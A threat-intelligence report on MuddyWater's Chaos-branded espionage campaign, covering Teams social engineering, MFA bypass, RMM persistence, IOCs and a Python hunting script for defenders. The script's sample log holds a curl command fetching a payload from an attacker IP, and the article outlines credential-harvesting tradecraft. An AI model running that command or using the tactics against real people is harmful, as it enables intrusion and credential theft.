MuddyWater, an Iran-linked state-sponsored group, has begun conducting targeted espionage and sabotage operations under the banner of the Chaos ransomware gang, using Microsoft Teams for highly interactive social engineering, credential theft, and multi-factor authentication bypass, while avoiding encryption and focusing on stealthy persistence and data exfiltration. This directly impacts organizations in the US and the Middle East and requires rethinking the handling of incidents that look like “ordinary” ransomware attacks but may in fact be pursuing Iran’s strategic objectives.
Technical details of MuddyWater’s Chaos-branded campaign
In the incident investigated by Rapid7 (early 2026), MuddyWater imitates the tradecraft of the Chaos RaaS group but changes the key objective: instead of encryption, the focus is on espionage activity and maintaining a foothold in the victim infrastructure.
Initial access: Microsoft Teams as a channel for high-touch social engineering
- The attack starts with external chats in Microsoft Teams: the attackers reach out to employees directly, often posing as IT support.
- Interactive screen sharing is used: the operator literally walks the victim through what to click and what to type.
- During the session:
- basic environment reconnaissance commands are executed;
- VPN configuration files are opened;
- users are asked to enter their login/password into locally created text files.
- Using the obtained credentials, the attackers bypass MFA by manipulating the user during the authentication process.
In MITRE ATT&CK terms this still maps to T1566 (Phishing), with T1566.003 (Spearphishing via Service) as the closest sub-technique, but it is not a classic email campaign: it is live, interactive social engineering inside the corporate messenger, and for the employee the line between "support" and attacker is almost completely blurred.
Persistence and movement: reliance on legitimate remote management tools
- For persistence, DWAgent and AnyDesk are used, as well as built-in capabilities such as RDP.
- In at least one case, AnyDesk is installed directly during the screen sharing session.
- Via RDP, the attacker launches curl to download the executable ms_upd.exe from an external server at 172.86.126[.]208.
- This binary initiates a multi-stage infection chain and deploys a RAT with the following capabilities:
- persistent connection to C2;
- polling the command server every 60 seconds;
- execution of system commands and PowerShell scripts;
- file operations;
- an interactive cmd.exe or PowerShell shell on operator request.
This tactic maps to T1078 (Valid Accounts), T1105 (Ingress Tool Transfer) and T1219 (Remote Access Software): instead of forcing their way in, the attackers live inside the infrastructure, masquerading as legitimate users and relying on legitimate tools.
Fake ransomware artefacts and the role of the certificate
- Within the victim’s infrastructure, artefacts linked to Chaos ransomware are observed (branding, extortion playbooks). However:
- no file encryption takes place;
- the emphasis is on data exfiltration and building long-term access;
- “ransom” negotiations are carried out over email.
- A critical attribution indicator is the use of a code-signing certificate with the subject “Donald Gay” to sign ms_upd.exe.
- The same certificate was previously used in the MuddyWater cluster to sign the CastleLoader (Fakeset) loader, which installs CastleRAT and other components.
It is precisely the certificate linkage, not the ransomware “brand”, that provides a reliable technical bridge between the current campaign and MuddyWater’s historical activity.
IOCs from the described campaign
- C2 / downloader IP address: 172.86.126[.]208
- Infrastructure IP address in the operation against Oman: 172.86.76[.]127
- Executable file: ms_upd.exe
- Code-signing certificate: subject "Donald Gay"
- RMM tools in a suspicious context: DWAgent, AnyDesk, Microsoft Quick Assist
MuddyWater group context and use of the criminal ecosystem
MuddyWater (also known as Seedworm, Mango Sandstorm, Static Kitten) has long been associated with Iran and is documented in MITRE’s profile as G0069. The current campaign is a logical continuation of its evolution.
From destructive “pseudo-ransomware” to deeply integrated RaaS
- 2020: attacks on Israeli organizations using the PowGoop loader, which deployed a modified Thanos variant with destructive capabilities.
- 2023: collaboration with the DEV‑1084 cluster (persona DarkBit) for destructive attacks masquerading as ransomware.
- October 2025: use of the Qilin ransomware against an Israeli public hospital via an affiliate partner program.
In each of these cases, ransomware was not the ultimate goal but rather a cover for destruction, coercion, and concealing intelligence objectives. In the new MuddyWater campaign under the “Chaos” brand, this becomes even more evident:
- methods and services typical of the commercial RaaS model are used (double, triple, and in some cases quadruple extortion — adding DDoS and pressure through contacting customers/competitors);
- however, instead of broad monetization there is a targeted interest in data, durable access, and specific organizations.
For SOC and IR teams, the main takeaway is: the presence of well-known ransomware “brands” in artefacts no longer guarantees that you are dealing with purely criminal extortion. It may be a state operation that uses the RaaS market as cover and logistics.
Other Iranian operations: Oman and the link to physical damage
Oman: open directory with C2 code and 26,000 user records
Hunt.io discovered an open directory on 172.86.76[.]127 containing:
- attack tooling and C2 code;
- session logs;
- archives of exfiltrated data.
The target was Oman’s Ministry of Justice and Legal Affairs (domain mjla.gov[.]om):
- more than 26,000 user records;
- data on court cases and committee decisions;
- dumps of the SAM and SYSTEM registry hives (together they yield the local account password hashes, a basis for offline cracking or pass-the-hash and for further compromise of accounts and the domain).
Hacktivism and the port of Fujairah: linking cyber and kinetic domains
In parallel, Iran-aligned proxy structures (for example, Handala Hack) claim:
- publication of data on nearly 400 US Navy servicemembers in the Persian Gulf;
- compromise of the port of Fujairah in the UAE with the leak of around 11,000 documents (bills of lading, shipping and customs records);
- use of the stolen port infrastructure information to target missile strikes.
If these claims are confirmed, this will be one of the clearest examples of cyber operations directly preparing the ground for the physical destruction of infrastructure targets. For operators of ports, logistics, and energy assets, this means that a traditional focus on protecting IT assets is insufficient without simultaneously analyzing how such data can increase the effectiveness of kinetic strikes.
Impact assessment and risk profile
- Geographic risk distribution: the US (the main body of Chaos victims as of March 2026), Israel, Oman, the UAE, and the wider Middle East.
- Sectors:
- construction, manufacturing, business services (typical Chaos targets);
- healthcare (the Israeli hospital);
- government and judicial sector (Oman);
- port and transport/logistics infrastructure (Fujairah).
- Types of consequences if no action is taken:
- long-term stealthy presence via RMM tools and valid accounts;
- leakage of sensitive data (personal data, court decisions, internal infrastructure schematics);
- use of data for political pressure, destabilization, or preparation of physical damage.
The highest risk is borne by organizations where RMM tools are widely used and poorly controlled, and where external communications in Teams are allowed by default.
Practical recommendations for defense and response
1. Strict control of Microsoft Teams and support channels
- Disable or restrict external chats in Teams to vetted partner domains.
- Configure alerts for:
- screen sharing sessions initiated with external users;
- bulk account operations or MFA setting changes performed during such sessions.
- Formalize a single IT support channel: employees must understand that any “support” outside this channel is suspicious.
- Include training with a specific scenario: “a person in Teams asks you to type your password into a text file / share your screen while entering your password” — this is a reason to immediately end the session and report it to security.
2. Management of RMM tools (DWAgent, AnyDesk, Quick Assist, etc.)
- Maintain an inventory of all approved remote administration tools.
- Implement application execution control (allow-list): any new RMM software outside the list is grounds for investigation.
- Monitor:
- installation and execution of AnyDesk and DWAgent on servers and critical workstations;
- outgoing sessions from this software to destinations outside corporate IP ranges.
- Prohibit the use of RDP from external addresses without VPN and strong authentication.
3. Strengthening authentication and countering social engineering around MFA
- Implement mechanisms such as number-matching and contextual prompts in MFA, making it harder to “pressure” a user via Teams.
- Limit the number of MFA prompts and lock the account after multiple denials (protection against MFA fatigue attacks).
- Minimize the presence of local administrators, especially on workstations of users who frequently interact externally (support, sales, port operators, etc.).
4. Searching for compromise traces and TTP-based threat hunting
- Review logs for:
- connections to 172.86.126[.]208 and 172.86.76[.]127 (directly or via curl);
- creation or execution of ms_upd.exe on servers and workstations;
- installation/execution of AnyDesk and DWAgent in atypical network segments;
- suspicious Microsoft Teams sessions with external users followed by activity from the same accounts in VPN/AD.
- Review the signer of recently executed or newly written signed binaries, not only certificates added to trust stores: a code-signing subject that does not correspond to any vendor you actually use (for example, “Donald Gay”) is grounds for investigation.
- Build detection rules for T1041 (Exfiltration Over C2 Channel) scenarios, taking into account long-lived, low-noise RAT sessions with periodic C2 polling.
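As an added example (not code from Rapid7, Hunt.io or the original article), the script below runs the hunts listed in this section over a small set of constructed telemetry: direct indicator matches (the two IP addresses, ms_upd.exe, the “Donald Gay” signer, RMM binaries), the Teams-to-access correlation (an external Teams chat followed by a VPN logon or an RMM install by the same account), and a periodicity check for the 60-second C2 polling described in the RAT capabilities earlier on the page. Only the indicator values come from the campaign; the event schema, sample events, host and user names, the RMM process names and the thresholds are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Indicators from the article. Everything else in this file is constructed.
IOC_IPS = {"172.86.126.208", "172.86.76.127"}
IOC_FILES = {"ms_upd.exe"}
IOC_SIGNERS = {"donald gay"}
# Process names for the RMM tools are an assumption, not from the article.
RMM_IMAGES = {"anydesk.exe", "dwagent.exe", "quickassist.exe"}

# Constructed sample telemetry (one JSON event per line, "ts" in UTC): a
# simplified normalization of Teams audit, VPN, process-creation and
# network-connection logs, not a vendor format.
SAMPLE_LOG = r"""
{"ts":"2026-03-02T09:00:00","host":"WS-017","user":"j.doe","type":"teams_external_chat","peer_domain":"helpdesk-support.example"}
{"ts":"2026-03-02T09:05:00","host":"WS-022","user":"a.smith","type":"process_create","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe","signer":"Microsoft Windows"}
{"ts":"2026-03-02T09:14:00","host":"WS-017","user":"j.doe","type":"process_create","image":"C:\\Users\\j.doe\\Downloads\\AnyDesk.exe","cmdline":"AnyDesk.exe --install","signer":"AnyDesk Software GmbH"}
{"ts":"2026-03-02T09:31:00","host":"VPN-GW","user":"j.doe","type":"vpn_logon","src_ip":"203.0.113.45"}
{"ts":"2026-03-02T10:02:00","host":"SRV-DB01","user":"j.doe","type":"process_create","image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl -o C:\\ProgramData\\ms_upd.exe http://172.86.126.208/ms_upd.exe","signer":"Microsoft Windows"}
{"ts":"2026-03-02T10:02:30","host":"SRV-DB01","user":"j.doe","type":"process_create","image":"C:\\ProgramData\\ms_upd.exe","cmdline":"ms_upd.exe","signer":"Donald Gay"}
{"ts":"2026-03-02T10:03:00","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:03:00","host":"WS-022","user":"a.smith","type":"net_conn","dst_ip":"10.0.0.5"}
{"ts":"2026-03-02T10:03:07","host":"WS-022","user":"a.smith","type":"net_conn","dst_ip":"10.0.0.5"}
{"ts":"2026-03-02T10:04:01","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:04:59","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:05:40","host":"WS-022","user":"a.smith","type":"net_conn","dst_ip":"10.0.0.5"}
{"ts":"2026-03-02T10:06:00","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:07:00","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:08:00","host":"SRV-DB01","user":"SYSTEM","type":"net_conn","dst_ip":"172.86.126.208"}
{"ts":"2026-03-02T10:09:12","host":"WS-022","user":"a.smith","type":"net_conn","dst_ip":"10.0.0.5"}
{"ts":"2026-03-02T10:09:13","host":"WS-022","user":"a.smith","type":"net_conn","dst_ip":"10.0.0.5"}
"""


def load_events(text):
    """Parse JSON lines and return the events sorted by timestamp."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ioc_hits(events):
    """Direct matches: IOC IPs, ms_upd.exe, the signer subject, RMM binaries."""
    hits = []
    for ev in events:
        reasons = []
        if ev["type"] == "process_create":
            image, cmd = basename(ev["image"]), ev.get("cmdline", "")
            if image in IOC_FILES or any(f in cmd.lower() for f in IOC_FILES):
                reasons.append("ioc_file")
            if ev.get("signer", "").lower() in IOC_SIGNERS:
                reasons.append("ioc_signer")
            if any(ip in cmd for ip in IOC_IPS):
                reasons.append("ioc_ip_in_cmdline")
            if image in RMM_IMAGES:
                reasons.append("rmm_tool")
        elif ev["type"] == "net_conn" and ev["dst_ip"] in IOC_IPS:
            reasons.append("ioc_ip")
        if reasons:
            hits.append((ev["ts"], ev["host"], ev["user"], reasons))
    return hits


def teams_then_access(events, window=timedelta(hours=2)):
    """External Teams chat followed within `window` by a VPN logon or an RMM
    install by the same account: the Teams -> credentials -> access sequence."""
    chats = defaultdict(list)
    for ev in events:
        if ev["type"] == "teams_external_chat":
            chats[ev["user"]].append(ev["ts"])
    alerts = []
    for ev in events:
        if ev["type"] == "vpn_logon":
            follow = "vpn_logon"
        elif ev["type"] == "process_create" and basename(ev["image"]) in RMM_IMAGES:
            follow = "rmm_install"
        else:
            continue
        if any(t0 <= ev["ts"] <= t0 + window for t0 in chats.get(ev["user"], [])):
            alerts.append((ev["user"], follow, ev["ts"]))
    return alerts


def beacon_candidates(events, min_conns=5, max_cv=0.15):
    """Flag (host, dst_ip) pairs whose connection spacing is nearly constant.
    Independent of the IOC list, so it also catches polling of an unknown C2:
    low jitter gives a small coefficient of variation (pstdev / mean) of gaps."""
    times = defaultdict(list)
    for ev in events:
        if ev["type"] == "net_conn":
            times[(ev["host"], ev["dst_ip"])].append(ev["ts"])
    found = []
    for (host, dst), ts in times.items():
        if len(ts) < min_conns:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        cv = pstdev(gaps) / period
        if cv <= max_cv:
            found.append((host, dst, round(period), round(cv, 3)))
    return found


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    for hit in ioc_hits(evs):
        print("IOC    ", *hit)
    for alert in teams_then_access(evs):
        print("CORREL ", *alert)
    for cand in beacon_candidates(evs):
        print("BEACON ", *cand)
```

On the sample data the script flags the AnyDesk install, the curl download and the signed ms_upd.exe, correlates the external Teams chat with both the RMM install and the VPN logon for the same account, and reports SRV-DB01 polling 172.86.126.208 at a 60-second period with a coefficient of variation of about 0.018, while the irregular connections from WS-022 are not flagged. In a real environment the events would come from a SIEM export rather than an inline string; the correlation window, the minimum connection count and the jitter threshold are the knobs to tune, and the periodicity check assumes per-connection timestamps rather than aggregated flow records.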
5. For the public sector and critical infrastructure in the region
- Segregate IT and operational technology (OT) networks, restricting routing between port, energy, and business system segments.
- Review supplier and contractor access to infrastructure management systems (including RMM and VPN). Any external access must be:
- tied to a specific individual identity;
- time-bound;
- logged and recorded (session recording).
- Include in incident response plans a scenario in which a “ransomware incident” may be a cover for preparing a physical strike (by analogy with the Fujairah port case).
The key takeaway for organizations operating sensitive data and infrastructure is that any incident containing elements of ransomware should now be treated as a potential state-sponsored operation. The top practical priority should be to update response procedures: in addition to blocking the ransomware, include systematic hunting for hidden persistence via RMM tools, analysis of data exfiltration, and review of anomalous activity in Teams and other remote interaction channels.